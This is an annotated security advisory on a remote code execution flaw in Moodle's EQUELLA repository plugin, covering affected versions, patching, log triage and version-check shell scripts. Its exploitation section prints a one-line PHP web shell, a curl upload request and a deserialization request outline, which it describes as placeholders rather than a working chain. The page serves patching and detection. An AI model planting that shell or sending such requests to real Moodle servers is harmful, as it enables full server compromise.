How the CVE Works:
The vulnerability lies in Moodle's EQUELLA repository integration. As reported here, insufficient validation of user-supplied parameters in the repository's file-handling code lets an authenticated user who is allowed to use the repository (typically a teacher or manager) reach code execution on the server, either by uploading a malicious file or by crafting a request that bypasses the plugin's checks; the report characterises the resulting bug class as server-side command injection or PHP object injection via deserialization. Exploitation requires the EQUELLA repository to be enabled (it is not enabled on a default install) and an account with the capability to use it, which narrows the attack surface but leaves affected instances exposed to full server compromise. The request details in the Exploitation section below are this page's illustration of the attack shape, not a published exploit chain.
DailyCVE Form:
Platform: Moodle LMS
Version: 4.5.0-4.5.3, 4.4.0-4.4.7, 4.3.0-4.3.11, 4.1.0-4.1.17 (4.2.x and everything older than 4.1 are out of security support and receive no fix)
Fixed in: 4.5.4, 4.4.8, 4.3.12, 4.1.18
Vulnerability: Remote Code Execution
Severity: High
Date: Apr 25, 2025
What Undercode Says:
Exploitation:
The request paths in steps 2 and 3 are placeholders used on this page and the "..." bodies are elided; they are not confirmed endpoints, so read the sequence as an outline of the attack shape rather than a working exploit. Every step needs a valid session for an account that can use the EQUELLA repository.
1. Payload Crafting (a minimal PHP web shell that runs the cmd query parameter):
<?php system($_GET['cmd']); ?>
2. File Upload Bypass (the form field name was garbled to an e-mail placeholder in the source and is left as is):
curl -F "[email protected]" -H "Cookie: MoodleSession=..." http://moodle-site/repository/equella/upload
3. Deserialization Trigger (a serialized PHP object delivered in the request body):
POST /repository/equella/process HTTP/1.1
...
{"payload":"O:8:"stdClass":1:{...}"}
Protection:
1. Patch Immediately:
Upgrade to 4.5.4, 4.4.8, 4.3.12 or 4.1.18; sites on 4.2 or older must move to a supported branch. Moodle is not distributed through Composer, so a composer require command does not apply. For a git-based install, from the Moodle root:
git fetch origin && git checkout v4.5.4
php admin/cli/maintenance.php --enable
php admin/cli/upgrade.php --non-interactive
php admin/cli/maintenance.php --disable
For a tarball install, replace the code tree with the release from download.moodle.org and run the same upgrade script.
2. Disable EQUELLA until patched:
Site administration > Plugins > Repositories > Manage repositories, set EQUELLA to Disabled. There is no enable_equella config key; repository plugin state lives in the repository table (default table prefix mdl_, check $CFG->prefix):
UPDATE mdl_repository SET visible = 0 WHERE type = 'equella';
php admin/cli/purge_caches.php
3. Web server rule (an nginx location block, not a WAF signature):
location ~ ^/repository/equella/ {
    deny all;
}
This only blocks the plugin's own endpoint. The filepicker reaches every repository type through repository/repository_ajax.php, which cannot be blocked without breaking all file uploads.
4. Log Monitoring:
Moodle keeps its event log in the database (logstore_standard_log), not under /var/log/moodle, and no event is named equella.upload. Check the web server access log for the plugin path, then pivot on any suspicious client in the logstore (timecreated is a Unix timestamp):
grep 'repository/equella/' /var/log/nginx/access.log
SELECT userid, ip, eventname, timecreated FROM mdl_logstore_standard_log WHERE ip = '<suspect ip>' ORDER BY timecreated DESC LIMIT 50;
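The access-log triage from the log monitoring step, written out as an added example that is not part of this page or of Moodle. It assumes the combined log format (client IP in field 1, quoted method in field 6, path in field 7, status in field 9), Moodle served from the document root, and the plugin's own endpoint living under /repository/equella/ (repository/equella/callback.php in the core plugin); the sample lines are constructed, not real traffic.

```shell
#!/bin/sh
# Added example, not code from the page or from Moodle: triage a web server
# access log for traffic that touched the EQUELLA repository plugin.
# Assumptions: combined log format, Moodle at the document root, plugin
# endpoint under /repository/equella/. Filepicker traffic goes through
# repository/repository_ajax.php for every repository type, so it is not
# EQUELLA-specific and is deliberately not matched here.

# Constructed sample lines (not real traffic): two clients hit the callback,
# one of them with a non-browser agent and a 500 response.
SAMPLE_LOG='203.0.113.7 - - [25/Apr/2025:10:01:02 +0000] "GET /course/view.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2025:10:01:10 +0000] "POST /repository/equella/callback.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Apr/2025:10:02:00 +0000] "POST /repository/equella/callback.php HTTP/1.1" 200 312 "-" "curl/8.5.0"
198.51.100.9 - - [25/Apr/2025:10:02:01 +0000] "POST /repository/equella/callback.php HTTP/1.1" 500 0 "-" "curl/8.5.0"
192.0.2.4 - - [25/Apr/2025:10:03:00 +0000] "GET /repository/repository_ajax.php?action=list&repo_id=5 HTTP/1.1" 200 880 "-" "Mozilla/5.0"'

# Reads an access log on stdin; prints "count ip method status" for every
# request under /repository/equella/, aggregated per client, most frequent first.
equella_hits() {
  awk '$7 ~ /^\/repository\/equella\// {
         key = $1 " " substr($6, 2) " " $9
         n[key]++
       }
       END { for (k in n) print n[k], k }' | sort -rn
}

# Reads an access log on stdin; prints the EQUELLA requests whose User-Agent
# does not look like a browser (heuristic: no "Mozilla/") or that drew a 5xx.
# Either is a reason to pull the matching session and user from the logstore.
equella_suspects() {
  awk '$7 ~ /^\/repository\/equella\// && ($0 !~ /"Mozilla\// || $9 ~ /^5/)'
}

# Number of suspect lines, for a threshold check in a cron job.
equella_suspect_count() {
  equella_suspects | wc -l | tr -d ' '
}

# Demo on the constructed sample; on a real host use e.g.
#   equella_suspects < /var/log/nginx/access.log
printf '%s\n' "$SAMPLE_LOG" | equella_hits
printf '%s\n' "$SAMPLE_LOG" | equella_suspects
```

The user-agent heuristic is only a starting point; a scripted attack can send a browser agent, so the aggregation by client and status is the more reliable signal, and the logstore query in step 4 is what ties a client IP back to a Moodle user.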
Detection:
1. Version Check:
Run from the Moodle root. CLI_SCRIPT must be defined before config.php is included, and the PHP must be single-quoted so the shell does not expand $CFG (in the page's double-quoted form the shell swallows $CFG and PHP fails to parse):
php -r 'define("CLI_SCRIPT", true); require "config.php"; echo $CFG->release, PHP_EOL;'
The site is affected if the release is 4.5.0-4.5.3, 4.4.0-4.4.7, 4.3.0-4.3.11, 4.1.0-4.1.17, or an unsupported branch (4.2.x, 4.0 and older). Then check whether the EQUELLA repository is enabled under Site administration > Plugins > Repositories > Manage repositories, since an enabled repository is the precondition this report gives for exploitation.
2. Vulnerability Scan:
The nmap line on this page refers to a placeholder script (http-vuln-cve2025-XXXX) that does not exist. Exploitation needs an authenticated account and an enabled EQUELLA repository, so an unauthenticated network scan cannot confirm the issue; rely on the version check.
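The version check above, as an added example that is not part of this page or of Moodle: a POSIX sh function that classifies a release string against the affected ranges listed in this advisory. It assumes the string is what $CFG->release or the $release line in version.php yields (e.g. "4.5.3 (Build: 20250414)") and goes slightly beyond the page by treating weekly "+" builds and out-of-support branches as their own cases.

```shell
#!/bin/sh
# Added example, not code from the page or from Moodle: classify a Moodle
# release string against the affected ranges given in this advisory.
# Assumes input like "4.5.3 (Build: 20250414)" from $CFG->release or
# from the $release line of version.php.

moodle_equella_rce_status() {
  rel=$1
  # A "+" release (e.g. 4.5.3+) is a weekly build from the stable branch; it may
  # already carry the fix even though the number is unchanged, so do not guess.
  case $rel in
    *+*) echo "check-build-date"; return 0 ;;
  esac
  # Keep only the leading dotted version, dropping " (Build: ...)" and the like.
  num=$(printf '%s' "$rel" | sed 's/[^0-9.].*$//')
  major=${num%%.*}
  rest=${num#*.}
  [ "$rest" = "$num" ] && rest=0          # "4" -> minor 0
  minor=${rest%%.*}
  patch=${rest#*.}
  [ "$patch" = "$rest" ] && patch=0       # "4.5" -> patch 0
  patch=${patch%%.*}                      # ignore any fourth component
  patch=${patch:-0}
  case "$major.$minor" in
    4.5) [ "$patch" -le 3 ]  && echo vulnerable || echo patched ;;
    4.4) [ "$patch" -le 7 ]  && echo vulnerable || echo patched ;;
    4.3) [ "$patch" -le 11 ] && echo vulnerable || echo patched ;;
    4.1) [ "$patch" -le 17 ] && echo vulnerable || echo patched ;;
    # 4.2, 4.0 and everything older are out of security support and get no fix.
    4.2|4.0|3.*|2.*|1.*) echo unsupported ;;
    *) echo not-listed ;;
  esac
}

# Usage from the Moodle root on a live install:
#   moodle_equella_rce_status "$(php -r 'define("CLI_SCRIPT", true); require "config.php"; echo $CFG->release;')"
# Or from a plain checkout without a database, reading the $release line of version.php:
#   moodle_equella_rce_status "$(grep '^\$release' version.php | cut -d"'" -f2)"
for r in "$@"; do
  printf '%s: %s\n' "$r" "$(moodle_equella_rce_status "$r")"
done
```

A "patched" result only says the release number is at or past the fixed release for that branch; it does not tell you whether the EQUELLA repository is enabled, which still has to be checked in the repository management page.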
Mitigation:
- Restrict who can use the repository: review which roles hold repository/equella:view (the capability each repository plugin declares) and keep teacher and manager accounts to trusted staff.
- Audit file upload logs (the web server access log together with logstore_standard_log).
- Harden PHP in php.ini as defence in depth, not as a substitute for the patch:
disable_functions = system,exec,shell_exec,passthru,proc_open,popen
Test before rolling this out: some Moodle features shell out (the antivirus and ghostscript integrations, pathtodu), and disabling these functions does not stop code that runs through include, eval or object injection.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode